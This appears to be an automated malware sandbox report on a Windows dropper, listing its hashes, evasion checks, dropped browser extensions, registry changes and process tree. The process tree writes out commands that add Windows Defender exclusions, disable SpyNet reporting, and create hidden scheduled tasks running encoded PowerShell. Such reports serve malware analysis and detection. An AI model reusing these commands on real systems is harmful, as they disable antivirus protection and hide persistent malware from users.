Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
123s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27/09/2022, 14:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3242ae2edccc379bf6f29af7969e3bbc
-
SHA1
a6a30fabb8a26ac544bfbb699c0553eff37116de
-
SHA256
1a3215e55898b9d944a1d74d2c77d72edbb6385613a51e9b22568fc942e83e28
-
SHA512
5876e2db0a58e416d72be43bea21aca6900d0eb5779b5cfffa58e53bc784664c8b454547dc451bbb51abd4e6b43ace3ee52367837d0179e940d3e002f8391fed
-
SSDEEP
196608:91OHzWMQ1MJoW7dz1VrfHEve6knxIwynv97oh7QGs:3OHzTZPNDkvFEEoh7Qt
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 62 1340 rundll32.exe 63 1340 rundll32.exe 65 1340 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 5040 Install.exe 1600 Install.exe 4972 dHrUWvg.exe 448 ZiFHcXT.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation ZiFHcXT.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 1 IoCs
pid Process 1340 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZiFHcXT.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json ZiFHcXT.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json ZiFHcXT.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZiFHcXT.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 ZiFHcXT.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 ZiFHcXT.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 ZiFHcXT.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini dHrUWvg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 ZiFHcXT.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dHrUWvg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZiFHcXT.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZiFHcXT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 ZiFHcXT.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\fCscXRmSsoZU2\iBKpDxJ.xml ZiFHcXT.exe File created C:\Program Files (x86)\yNjTJhHiELlhC\cTLLege.xml ZiFHcXT.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZiFHcXT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZiFHcXT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZiFHcXT.exe File created C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\sRoWRPe.xml ZiFHcXT.exe File created C:\Program Files (x86)\yNjTJhHiELlhC\tgFMuxk.dll ZiFHcXT.exe File created C:\Program Files (x86)\MCYGDcGEHxUn\FdfaUFg.dll ZiFHcXT.exe File created C:\Program Files (x86)\jPDVFKipU\osfrqn.dll ZiFHcXT.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZiFHcXT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZiFHcXT.exe File created C:\Program Files (x86)\jPDVFKipU\RSLJtAC.xml ZiFHcXT.exe File created C:\Program Files (x86)\fCscXRmSsoZU2\coNsEfFrLqEnn.dll ZiFHcXT.exe File created C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\aCsODHW.dll ZiFHcXT.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\SXVvvXCuCecgohx.job schtasks.exe File created C:\Windows\Tasks\ZGhVhnWHpCkuylUXB.job schtasks.exe File created C:\Windows\Tasks\bJrbMHMDNUyqMIPThG.job schtasks.exe File created C:\Windows\Tasks\FFlCdDCQpdthnDzXV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1148 schtasks.exe 4388 schtasks.exe 1948 schtasks.exe 3188 schtasks.exe 2972 schtasks.exe 4620 schtasks.exe 2892 schtasks.exe 3172 schtasks.exe 680 schtasks.exe 2668 schtasks.exe 3808 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZiFHcXT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ZiFHcXT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} ZiFHcXT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" ZiFHcXT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ZiFHcXT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ZiFHcXT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ZiFHcXT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" ZiFHcXT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ZiFHcXT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 1168 powershell.EXE 1168 powershell.EXE 2528 powershell.exe 2528 powershell.exe 3432 powershell.exe 3432 powershell.exe 4340 powershell.EXE 4340 powershell.EXE 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe 448 ZiFHcXT.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1168 powershell.EXE Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 4340 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4308 wrote to memory of 5040 4308 file.exe 81 PID 4308 wrote to memory of 5040 4308 file.exe 81 PID 4308 wrote to memory of 5040 4308 file.exe 81 PID 5040 wrote to memory of 1600 5040 Install.exe 82 PID 5040 wrote to memory of 1600 5040 Install.exe 82 PID 5040 wrote to memory of 1600 5040 Install.exe 82 PID 1600 wrote to memory of 4932 1600 Install.exe 86 PID 1600 wrote to memory of 4932 1600 Install.exe 86 PID 1600 wrote to memory of 4932 1600 Install.exe 86 PID 1600 wrote to memory of 1884 1600 Install.exe 88 PID 1600 wrote to memory of 1884 1600 Install.exe 88 PID 1600 wrote to memory of 1884 1600 Install.exe 88 PID 4932 wrote to memory of 3680 4932 forfiles.exe 90 PID 4932 wrote to memory of 3680 4932 forfiles.exe 90 PID 4932 wrote to memory of 3680 4932 forfiles.exe 90 PID 3680 wrote to memory of 1772 3680 cmd.exe 91 PID 3680 wrote to memory of 1772 3680 cmd.exe 91 PID 3680 wrote to memory of 1772 3680 cmd.exe 91 PID 1884 wrote to memory of 4844 1884 forfiles.exe 92 PID 1884 wrote to memory of 4844 1884 forfiles.exe 92 PID 1884 wrote to memory of 4844 1884 forfiles.exe 92 PID 3680 wrote to memory of 3948 3680 cmd.exe 94 PID 3680 wrote to memory of 3948 3680 cmd.exe 94 PID 3680 wrote to memory of 3948 3680 cmd.exe 94 PID 4844 wrote to memory of 3592 4844 cmd.exe 93 PID 4844 wrote to memory of 3592 4844 cmd.exe 93 PID 4844 wrote to memory of 3592 4844 cmd.exe 93 PID 4844 wrote to memory of 2104 4844 cmd.exe 95 PID 4844 wrote to memory of 2104 4844 cmd.exe 95 PID 4844 wrote to memory of 2104 4844 cmd.exe 95 PID 1600 wrote to memory of 3808 1600 Install.exe 97 PID 1600 wrote to memory of 3808 1600 Install.exe 97 PID 1600 wrote to memory of 3808 1600 Install.exe 97 PID 1600 wrote to memory of 3996 1600 Install.exe 99 PID 1600 wrote to memory of 3996 1600 Install.exe 99 PID 1600 wrote to memory of 3996 1600 Install.exe 99 PID 1168 wrote to memory of 4412 1168 powershell.EXE 105 PID 1168 wrote to memory of 4412 1168 powershell.EXE 105 PID 1600 wrote to memory of 1252 1600 Install.exe 111 PID 1600 wrote to memory of 1252 1600 Install.exe 111 PID 1600 wrote to memory of 1252 1600 Install.exe 111 PID 1600 wrote to memory of 3172 1600 Install.exe 113 PID 1600 wrote to memory of 3172 1600 Install.exe 113 PID 1600 wrote to memory of 3172 1600 Install.exe 113 PID 4972 wrote to memory of 2528 4972 dHrUWvg.exe 116 PID 4972 wrote to memory of 2528 4972 dHrUWvg.exe 116 PID 4972 wrote to memory of 2528 4972 dHrUWvg.exe 116 PID 2528 wrote to memory of 2368 2528 powershell.exe 118 PID 2528 wrote to memory of 2368 2528 powershell.exe 118 PID 2528 wrote to memory of 2368 2528 powershell.exe 118 PID 2368 wrote to memory of 4588 2368 cmd.exe 119 PID 2368 wrote to memory of 4588 2368 cmd.exe 119 PID 2368 wrote to memory of 4588 2368 cmd.exe 119 PID 2528 wrote to memory of 4024 2528 powershell.exe 120 PID 2528 wrote to memory of 4024 2528 powershell.exe 120 PID 2528 wrote to memory of 4024 2528 powershell.exe 120 PID 2528 wrote to memory of 4268 2528 powershell.exe 121 PID 2528 wrote to memory of 4268 2528 powershell.exe 121 PID 2528 wrote to memory of 4268 2528 powershell.exe 121 PID 2528 wrote to memory of 4016 2528 powershell.exe 122 PID 2528 wrote to memory of 4016 2528 powershell.exe 122 PID 2528 wrote to memory of 4016 2528 powershell.exe 122 PID 2528 wrote to memory of 3456 2528 powershell.exe 123 PID 2528 wrote to memory of 3456 2528 powershell.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\7zSE0B0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\7zSE506.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1772
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3948
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4844 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3592
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2104
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWIpEJDOa" /SC once /ST 03:54:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWIpEJDOa"4⤵PID:3996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWIpEJDOa"4⤵PID:1252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bJrbMHMDNUyqMIPThG" /SC once /ST 16:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe\" FN /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3172
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4412
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3796
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exeC:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe FN /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
